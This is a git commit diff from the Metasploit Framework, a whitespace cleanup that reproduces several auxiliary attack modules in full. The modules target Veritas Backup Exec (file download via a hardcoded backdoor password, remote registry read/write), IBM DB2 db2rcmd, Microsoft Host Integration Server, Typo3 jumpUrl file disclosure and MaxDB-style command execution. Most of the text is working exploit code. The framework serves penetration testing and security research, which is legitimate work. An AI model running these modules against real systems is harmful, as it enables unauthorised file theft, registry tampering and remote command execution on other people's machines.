big module whitespace/formatting cleanup pass
git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
54725099d5
commit
0ea6eca4bc
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -18,13 +18,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::NDMP
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Veritas Backup Exec Windows Remote File Access',
|
||||
'Description' => %q{
|
||||
This module abuses a logic flaw in the Backup Exec Windows Agent to download
|
||||
arbitrary files from the system. This flaw was found by someone who wishes to
|
||||
remain anonymous and affects all known versions of the Backup Exec Windows Agent. The
|
||||
output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program
|
||||
remain anonymous and affects all known versions of the Backup Exec Windows Agent. The
|
||||
output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program
|
||||
listed in the references section. To transfer an entire directory, specify a
|
||||
path that includes a trailing backslash.
|
||||
},
|
||||
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '18695'],
|
||||
['OSVDB', '18695'],
|
||||
['BID', '14551'],
|
||||
['URL', 'http://www.fpns.net/willy/msbksrc.lzh'],
|
||||
],
|
||||
@ -43,44 +43,44 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DefaultAction' => 'Download'
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(10000),
|
||||
OptAddress.new('LHOST',
|
||||
OptAddress.new('LHOST',
|
||||
[
|
||||
false,
|
||||
"The local IP address to accept the data connection"
|
||||
]
|
||||
),
|
||||
OptPort.new('LPORT',
|
||||
OptPort.new('LPORT',
|
||||
[
|
||||
false,
|
||||
"The local port to accept the data connection"
|
||||
]
|
||||
),
|
||||
OptString.new('RPATH',
|
||||
[
|
||||
),
|
||||
OptString.new('RPATH',
|
||||
[
|
||||
true,
|
||||
"The remote filesystem path to download",
|
||||
"The remote filesystem path to download",
|
||||
"C:\\boot.ini"
|
||||
]
|
||||
),
|
||||
OptString.new('LPATH',
|
||||
[
|
||||
OptString.new('LPATH',
|
||||
[
|
||||
true,
|
||||
"The local filename to store the exported data",
|
||||
"The local filename to store the exported data",
|
||||
"backupexec_dump.mtf"
|
||||
]
|
||||
),
|
||||
),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
print_status("Attempting to retrieve #{datastore['RPATH']}...")
|
||||
|
||||
|
||||
lfd = File.open(datastore['LPATH'], 'w')
|
||||
|
||||
|
||||
connect
|
||||
data = ndmp_recv()
|
||||
if (not data)
|
||||
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
username = "root"
|
||||
password = "\xb4\xb8\x0f\x26\x20\x5c\x42\x34\x03\xfc\xae\xee\x8f\x91\x3d\x6f"
|
||||
|
||||
|
||||
#
|
||||
# Authenticate using the backdoor password
|
||||
#
|
||||
@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
username,
|
||||
password
|
||||
].pack('NNNNNNNNA*A*')
|
||||
|
||||
|
||||
print_status("Sending magic authentication request...")
|
||||
ndmp_send(auth)
|
||||
data = ndmp_recv()
|
||||
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_error("Did not receive a response to our authentication request")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
@ -125,10 +125,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
sfd = Rex::Socket.create_tcp_server(
|
||||
'LocalPort' => datastore['LPORT']
|
||||
)
|
||||
|
||||
|
||||
local_addr = (datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']))
|
||||
local_port = sfd.getsockname[2]
|
||||
|
||||
|
||||
#
|
||||
# Create the DATA_CONNECT request
|
||||
#
|
||||
@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
Rex::Socket.gethostbyname(local_addr)[3],
|
||||
local_port
|
||||
].pack('NNNNNNNA4N')
|
||||
|
||||
|
||||
print_status("Sending data connection request...")
|
||||
ndmp_send(conn)
|
||||
data = ndmp_recv()
|
||||
@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
sfd.close
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Wait for the agent to connect back
|
||||
@ -160,8 +160,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Waiting for the data connection...")
|
||||
rfd = sfd.accept()
|
||||
sfd.close
|
||||
|
||||
|
||||
|
||||
|
||||
#
|
||||
# Create the Mover Set Record Size request
|
||||
#
|
||||
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
0,
|
||||
0x8000
|
||||
].pack('NNNNNNN')
|
||||
|
||||
|
||||
print_status("Sending transfer parameters...")
|
||||
ndmp_send(msrs)
|
||||
data = ndmp_recv()
|
||||
@ -182,18 +182,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_error("Did not receive a response to our parameters request")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
# Define our tranfer parameters
|
||||
#
|
||||
xenv =
|
||||
xenv =
|
||||
[
|
||||
['USERNAME', ''],
|
||||
['BU_EXCLUDE_ACTIVE_FILES', '0'],
|
||||
['FILESYSTEM', "\"\\\\#{datastore['RHOST']}\\#{datastore['RPATH']}\",v0,t0,l0,n0,f0"]
|
||||
]
|
||||
|
||||
|
||||
#
|
||||
# Create the DATA_START_BACKUP request
|
||||
#
|
||||
@ -208,26 +208,26 @@ class Metasploit3 < Msf::Auxiliary
|
||||
].pack('NNNNNNN')
|
||||
bkup += "dump"
|
||||
bkup += [ xenv.length ].pack('N')
|
||||
|
||||
|
||||
#
|
||||
# Encode the transfer parameters
|
||||
#
|
||||
xenv.each do |e|
|
||||
k,v = e
|
||||
|
||||
|
||||
# Variable
|
||||
bkup += [k.length].pack('N')
|
||||
bkup += k
|
||||
bkup += Rex::Encoder::NDR.align(k)
|
||||
|
||||
|
||||
# Value
|
||||
bkup += [v.length].pack('N')
|
||||
bkup += v
|
||||
bkup += Rex::Encoder::NDR.align(v)
|
||||
bkup += Rex::Encoder::NDR.align(v)
|
||||
end
|
||||
|
||||
|
||||
bkup[-1, 1] = "\x01"
|
||||
|
||||
|
||||
print_status("Sending backup request...")
|
||||
ndmp_send(bkup)
|
||||
data = ndmp_recv()
|
||||
@ -236,7 +236,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Create the GET_ENV request
|
||||
#
|
||||
@ -246,7 +246,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
0,
|
||||
0x4004,
|
||||
0,
|
||||
0
|
||||
0
|
||||
].pack('NNNNNN')
|
||||
|
||||
print_status("Sending environment request...")
|
||||
@ -256,14 +256,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_error("Did not receive a response to our environment request")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
|
||||
#
|
||||
end
|
||||
|
||||
#
|
||||
# Start transferring data
|
||||
#
|
||||
print_status("Transferring data...")
|
||||
bcnt = 0
|
||||
|
||||
|
||||
begin
|
||||
while (data = rfd.get_once)
|
||||
bcnt += data.length
|
||||
@ -271,13 +271,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
rescue ::EOFError
|
||||
end
|
||||
|
||||
|
||||
lfd.close
|
||||
rfd.close
|
||||
|
||||
|
||||
print_status("Transferred #{bcnt} bytes.")
|
||||
disconnect
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,14 +19,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include ::Rex::Platforms::Windows
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Veritas Backup Exec Server Registry Access',
|
||||
'Description' => %q{
|
||||
This modules exploits a remote registry access flaw in the BackupExec Windows
|
||||
Server RPC service. This vulnerability was discovered by Pedram Amini and is based
|
||||
on the NDR stub information information posted to openrce.org.
|
||||
on the NDR stub information information posted to openrce.org.
|
||||
Please see the action list for the different attack modes.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
@ -42,16 +42,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
['System Information'],
|
||||
['Create Logon Notice']
|
||||
],
|
||||
'DefaultAction' => 'System Information'
|
||||
'DefaultAction' => 'System Information'
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(6106),
|
||||
OptString.new('WARN',
|
||||
[
|
||||
OptString.new('WARN',
|
||||
[
|
||||
false,
|
||||
"The warning to display for the Logon Notice action",
|
||||
"The warning to display for the Logon Notice action",
|
||||
"Compromised by Metasploit!\r\n"
|
||||
]
|
||||
),
|
||||
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def auxiliary_commands
|
||||
return {
|
||||
return {
|
||||
"regread" => "Read a registry value",
|
||||
# "regenum" => "Enumerate registry keys",
|
||||
}
|
||||
@ -73,15 +73,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
logon_notice()
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
def cmd_regread(*args)
|
||||
|
||||
|
||||
if (args.length == 0)
|
||||
print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
paths = args[0].split("\\")
|
||||
hive = paths.shift
|
||||
subval = paths.pop
|
||||
@ -97,12 +97,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def cmd_regenum(*args)
|
||||
|
||||
|
||||
if (args.length == 0)
|
||||
print_status("Usage: regenum HKLM\\\\Software")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
paths = args[0].split("\\")
|
||||
hive = paths.shift
|
||||
subkey = "\\" + paths.join("\\")
|
||||
@ -115,10 +115,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
||||
def system_info
|
||||
print_status("Dumping system information...")
|
||||
|
||||
|
||||
prod_id = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'
|
||||
prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)'
|
||||
prod_sp = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack'
|
||||
@ -132,14 +132,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")
|
||||
print_status("The system runs on a #{deunicode(cpu)}")
|
||||
end
|
||||
|
||||
|
||||
def logon_notice
|
||||
print_status("Setting the logon warning to #{datastore['WARN'].strip}...")
|
||||
backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText', REG_SZ, datastore['WARN'])
|
||||
backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption', REG_SZ, 'METASPLOIT')
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
def deunicode(str)
|
||||
str.gsub(/\x00/, '').strip
|
||||
end
|
||||
@ -149,9 +149,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
#
|
||||
def backupexec_regwrite(hive, subkey, subval, type, data)
|
||||
stub = backupexec_regrpc_write(
|
||||
:hive => registry_hive_lookup(hive),
|
||||
:subkey => subkey,
|
||||
:subval => subval,
|
||||
:hive => registry_hive_lookup(hive),
|
||||
:subkey => subkey,
|
||||
:subval => subval,
|
||||
:type => type,
|
||||
:data => data
|
||||
)
|
||||
@ -159,15 +159,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return false if resp.length == 0
|
||||
return true
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Read a registry key
|
||||
#
|
||||
def backupexec_regread(hive, subkey, subval, type = REG_SZ)
|
||||
stub = backupexec_regrpc_read(
|
||||
:hive => registry_hive_lookup(hive),
|
||||
:subkey => subkey,
|
||||
:subval => subval,
|
||||
:hive => registry_hive_lookup(hive),
|
||||
:subkey => subkey,
|
||||
:subval => subval,
|
||||
:type => type
|
||||
)
|
||||
resp = backupexec_regrpc_call(4, stub)
|
||||
@ -184,40 +184,40 @@ class Metasploit3 < Msf::Auxiliary
|
||||
#
|
||||
def backupexec_regenum(hive, subkey)
|
||||
stub = backupexec_regrpc_enum(
|
||||
:hive => registry_hive_lookup(hive),
|
||||
:hive => registry_hive_lookup(hive),
|
||||
:subkey => subkey
|
||||
)
|
||||
resp = backupexec_regrpc_call(7, stub)
|
||||
p resp
|
||||
|
||||
|
||||
return nil if resp.length == 0
|
||||
ret, len = resp[0,8].unpack('VV')
|
||||
return nil if ret == 0
|
||||
return nil if len == 0
|
||||
return resp[8, len]
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Call the backupexec registry service
|
||||
#
|
||||
#
|
||||
def backupexec_regrpc_call(opnum, data = '')
|
||||
|
||||
handle = dcerpc_handle(
|
||||
'93841fd0-16ce-11ce-850d-02608c44967b', '1.0',
|
||||
'ncacn_ip_tcp', [datastore['RPORT']]
|
||||
)
|
||||
|
||||
|
||||
dcerpc_bind(handle)
|
||||
|
||||
resp = dcerpc.call(opnum, data)
|
||||
outp = ''
|
||||
|
||||
|
||||
if (dcerpc.last_response and dcerpc.last_response.stub_data)
|
||||
outp = dcerpc.last_response.stub_data
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
|
||||
outp
|
||||
end
|
||||
|
||||
@ -261,11 +261,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
hive = opts[:hive] || HKEY_LOCAL_MACHINE
|
||||
type = opts[:type] || REG_SZ
|
||||
data = opts[:data] || ''
|
||||
|
||||
if (type == REG_SZ || type == REG_EXPAND_SZ)
|
||||
|
||||
if (type == REG_SZ || type == REG_EXPAND_SZ)
|
||||
data = Rex::Text.to_unicode(data+"\x00")
|
||||
end
|
||||
|
||||
|
||||
stub =
|
||||
NDR.UnicodeConformantVaryingString(subkey) +
|
||||
NDR.UnicodeConformantVaryingString(subval) +
|
||||
@ -279,5 +279,5 @@ class Metasploit3 < Msf::Auxiliary
|
||||
NDR.long(hive)
|
||||
return stub
|
||||
end
|
||||
|
||||
|
||||
end
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access',
|
||||
'Description' => %q{
|
||||
This module tests for a logic vulnerability in the Cisco VPN Concentrator
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -12,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::SMB
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'IBM DB2 db2rcmd.exe Command Execution Vulnerability.',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the Remote Command Server
|
||||
@ -31,12 +35,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Mar 4 2004'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
OptString.new('CMD', [ true, 'The command to execute', 'ver']),
|
||||
OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin']),
|
||||
OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin'])
|
||||
], self.class )
|
||||
], self.class )
|
||||
end
|
||||
|
||||
def run
|
||||
@ -46,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
|
||||
|
||||
# Connect with a valid user/pass. if not, then bail.
|
||||
# Connect with a valid user/pass. if not, then bail.
|
||||
begin
|
||||
smb_login()
|
||||
rescue ::Exception => e
|
||||
@ -54,8 +58,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
|
||||
# Have it so our command arg is convenient to call.
|
||||
|
||||
# Have it so our command arg is convenient to call.
|
||||
rcmd = datastore['CMD']
|
||||
|
||||
print_status("Connecting to named pipe \\DB2REMOTECMD...")
|
||||
@ -84,10 +88,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
# Read from the pipe and give us the data.
|
||||
res = pipe.read()
|
||||
puts res
|
||||
|
||||
|
||||
# Close the named pipe and disconnect from the socket.
|
||||
pipe.close
|
||||
pipe.close
|
||||
disconnect
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -31,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'May 27 2008'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(3000),
|
||||
OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),
|
||||
@ -43,17 +47,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
data = "\x75" + datastore['CMD']
|
||||
pad = "\x00" * 512
|
||||
|
||||
pkt = data + pad
|
||||
|
||||
print_status("Sending command: #{datastore['CMD']}")
|
||||
|
||||
pkt = data + pad
|
||||
|
||||
print_status("Sending command: #{datastore['CMD']}")
|
||||
sock.put(pkt)
|
||||
|
||||
# try to suck it all in.
|
||||
sleep(5)
|
||||
|
||||
|
||||
res = sock.get_once
|
||||
|
||||
|
||||
res.each do |info|
|
||||
puts "[*] #{info.gsub(/[^[:print:]]+/,"")}" # hack.
|
||||
end
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -31,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'May 27 2008'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(3500),
|
||||
OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > metasploit.txt']),
|
||||
@ -43,17 +47,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
data = "\x75" + datastore['CMD']
|
||||
pad = "\x00" * 512
|
||||
|
||||
pkt = data + pad
|
||||
|
||||
|
||||
pkt = data + pad
|
||||
|
||||
# commands are executed blindly.
|
||||
print_status("Sending command: #{datastore['CMD']}")
|
||||
print_status("Sending command: #{datastore['CMD']}")
|
||||
sock.put(pkt)
|
||||
|
||||
sleep(1)
|
||||
|
||||
|
||||
sock.get_once
|
||||
|
||||
|
||||
print_status("Executed '#{datastore['CMD']}'...")
|
||||
|
||||
disconnect
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HP Web JetAdmin 6.5 Server Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
This module abuses a command execution vulnerability within the
|
||||
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'URL', 'http://www.milw0rm.com/exploits/294' ],
|
||||
],
|
||||
'DisclosureDate' => 'Apr 27 2004'))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8000),
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -18,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
This module exploits a file disclosure vulnerability in the jumpUrl mechanism of
|
||||
Typo3. This flaw can be used to read any file that the web server user account has
|
||||
access to.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
error_uri = datastore['URI'] + "/index.php?jumpurl=" +datastore['RFILE'] +"&juSecure=1&type=0&locationData=1:"
|
||||
ju_hash = nil
|
||||
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => error_uri,
|
||||
'method' => 'GET',
|
||||
@ -65,24 +69,24 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
if (res and res.message == "OK")
|
||||
res.body =~ /jumpurl Secure: Calculated juHash, ((\w)+), did not match the submitted juHash./
|
||||
|
||||
|
||||
if $1.nil?
|
||||
print_error("Error while getting juHash. Maybe the version is already patched...")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
ju_hash = $1
|
||||
print_status("Getting juHash from error message: #{ju_hash}")
|
||||
|
||||
|
||||
else
|
||||
print_error("No response from the server.")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
file_uri = datastore['URI'] + "/index.php?jumpurl=" +datastore['RFILE'] +"&juSecure=1&type=0&juHash=#{ju_hash}&locationData=1:"
|
||||
print_status("Trying to get #{datastore['RFILE']}.")
|
||||
|
||||
print_status("Trying to get #{datastore['RFILE']}.")
|
||||
|
||||
file = send_request_raw({
|
||||
'uri' => file_uri,
|
||||
'method' => 'GET',
|
||||
@ -92,15 +96,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
},25)
|
||||
|
||||
|
||||
if (file and file.message = "OK")
|
||||
if file.body == 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!'
|
||||
print_error("File #{datastore['RFILE']} does not exist.")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
print_status("Writing local file #{datastore['LFILE']}.")
|
||||
open(datastore['LFILE'],'w') {|f| f << file.body }
|
||||
open(datastore['LFILE'],'w') {|f| f << file.body }
|
||||
else
|
||||
print_error("Error while getting file.")
|
||||
end
|
||||
|
@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Jan 9 2008'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(7210),
|
||||
OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),
|
||||
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
sock.put(pdbmsrv)
|
||||
sock.get_once
|
||||
sock.put(db_version)
|
||||
|
||||
|
||||
ver = sock.get_once
|
||||
|
||||
info = ver[27,2000]
|
||||
@ -69,10 +69,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
#Send our command.
|
||||
len = 39 + datastore['CMD'].length
|
||||
|
||||
|
||||
data = len.chr + "\x00\x00\x00\x03\x3F\x00\x00\x01\x00\x00\x00\x54\x0D\x00\x00"
|
||||
data << "\x00\x00\x04\x00" + len.chr + "\x00\x00\x00\x65\x78\x65\x63\x5F\x73\x64"
|
||||
data << "\x62\x69\x6E\x66\x6F\x20\x26\x26" + "#{datastore['CMD']}"
|
||||
data << "\x62\x69\x6E\x66\x6F\x20\x26\x26" + "#{datastore['CMD']}"
|
||||
|
||||
sock.put(data)
|
||||
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -12,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft Host Integration Server 2006 Command Execution Vulnerability.',
|
||||
'Description' => %q{
|
||||
This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.
|
||||
@ -33,12 +37,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Oct 14 2008'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(0),
|
||||
OptString.new('COMMAND', [ true, 'The command to execute', 'cmd.exe']),
|
||||
OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt'])
|
||||
], self.class )
|
||||
OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt'])
|
||||
], self.class )
|
||||
end
|
||||
|
||||
def run
|
||||
@ -53,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if (dport == 0)
|
||||
|
||||
dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.0', 'ncacn_ip_tcp')
|
||||
dport ||= dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.1', 'ncacn_ip_tcp')
|
||||
dport ||= dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.1', 'ncacn_ip_tcp')
|
||||
|
||||
if (not dport)
|
||||
print_status("Could not determine the RPC port used by the Service.")
|
||||
@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Bound to #{handle} ...")
|
||||
|
||||
cmd = NDR.string("#{datastore['COMMAND']}") + NDR.string("#{datastore['ARGS']}")
|
||||
|
||||
|
||||
print_status("Sending command: #{datastore['COMMAND']} #{datastore['ARGS']}")
|
||||
|
||||
begin
|
||||
@ -81,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
=begin
|
||||
|
@ -1,3 +1,6 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
@ -13,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SQL Server Configuration Enumerator',
|
||||
@ -31,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run
|
||||
print_status("Running MS SQL Server Enumeration...")
|
||||
|
||||
|
||||
if mssql_login_datastore
|
||||
#Get Version
|
||||
print_status("Version:")
|
||||
@ -42,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print "[*]\t#{row}"
|
||||
end
|
||||
